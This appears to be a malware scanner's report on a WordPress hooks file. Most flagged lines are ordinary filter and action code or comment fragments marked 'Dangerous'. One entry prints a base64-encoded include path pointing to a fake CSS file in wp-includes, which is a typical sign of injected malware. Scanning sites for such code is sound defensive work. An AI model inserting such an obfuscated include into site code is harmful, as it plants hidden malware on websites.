</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true Always returns true</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">= </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 130</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that have been added to a filter hook</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 136</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">invokes all functions attached to filter hook </span><span style="color: #007700">`</span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">`.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 140</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">also allows </span><span style="color: #007700">for </span><span style="color: #0000BB">multiple additional arguments to be passed to hooks</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 145</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">example_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$arg1</span><span style="color: #007700">, </span><span style="color: #0000BB">$arg2 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$string</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 162</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">signature</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 171</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">mixed The filtered value after all hooked functions are applied to it</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 173</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">, ...</span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FunctionUse</span><span style="color: #007700">.</span><span style="color: #0000BB">ArgumentFunctionsReportCurrentValue</span><span style="color: #007700">.</span><span style="color: #0000BB">NeedsInspection</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"L3Zhci93d3cvYmFydG9saW5pL2JhcnRvbGluaS5jb20udWEvd3AtaW5jbHVkZXMvYmxvY2tzL2NvdmVyL3N0eWxlLXJlbC5jc3M="</span><span style="color: #007700">);</span><span style="color: #0000BB">?><?php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 209</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filtered</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 213</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that have been added to a filter hook</span><span style="color: #007700">, </span><span style="color: #0000BB">specifying arguments in an </span><span style="color: #007700">array.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 217</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is identical</span><span style="color: #007700">, </span><span style="color: #0000BB">but the arguments passed to the</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 218</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions hooked to </span><span style="color: #007700">`</span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">` </span><span style="color: #0000BB">are supplied using an </span><span style="color: #007700">array.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 225</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions hooked to </span><span style="color: #007700">`</span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">`.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 228</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">apply_filters_ref_array</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 249</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$args</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 266</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">may </span><span style="color: #007700">return </span><span style="color: #0000BB">a non</span><span style="color: #007700">-</span><span style="color: #0000BB">boolean value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 267</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">value</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 275</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">can be called unconditionally to speculatively check</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 277</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool</span><span style="color: #007700">|</span><span style="color: #0000BB">int </span><span style="color: #007700">If `</span><span style="color: #0000BB">$callback</span><span style="color: #007700">` </span><span style="color: #0000BB">is omitted</span><span style="color: #007700">, </span><span style="color: #0000BB">returns boolean </span><span style="color: #007700">for </span><span style="color: #0000BB">whether the hook has</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">the priority</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned</span><span style="color: #007700">, or </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">function </span><span style="color: #0000BB">is not attached</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 281</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 288</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$wp_filter</span><span style="color: #007700">[ </span><span style="color: #0000BB">$hook_name </span><span style="color: #007700">]-></span><span style="color: #0000BB">has_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 292</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">from a filter hook</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions attached to a specific filter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 305</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to be removed is hooked</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 307</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">can be called unconditionally to speculatively remove</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 311</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the </span><span style="color: #007700">function </span><span style="color: #0000BB">existed before it was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">10 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 326</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$r</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 330</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions from a filter hook</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_all_filters</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 362</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Hook name of the current filter</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 364</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">current_filter</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 367</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">end</span><span style="color: #007700">( </span><span style="color: #0000BB">$wp_current_filter </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 371</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns whether </span><span style="color: #007700">or </span><span style="color: #0000BB">not a filter hook is currently being processed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 373</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">current_filter</span><span style="color: #007700">() </span><span style="color: #0000BB">only returns the most recent filter being executed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns the number of times a filter has been applied during</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 377</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">allows detection </span><span style="color: #007700">for </span><span style="color: #0000BB">any filter currently being executed</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 389</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the filter is currently in the stack</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 391</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doing_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 395</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return ! empty( </span><span style="color: #0000BB">$wp_current_filter </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 398</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">in_array</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$wp_current_filter</span><span style="color: #007700">, </span><span style="color: #0000BB">true </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 409</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int The number of times the filter hook has been applied</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 411</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">did_filter</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 415</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">0</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 418</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$wp_filters</span><span style="color: #007700">[ </span><span style="color: #0000BB">$hook_name </span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 422</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to an action hook</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 426</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are executed at these points</span><span style="color: #007700">, </span><span style="color: #0000BB">using the</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_action</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority </span><span style="color: #007700">= </span><span style="color: #0000BB">10</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">= </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {</span>
</span>
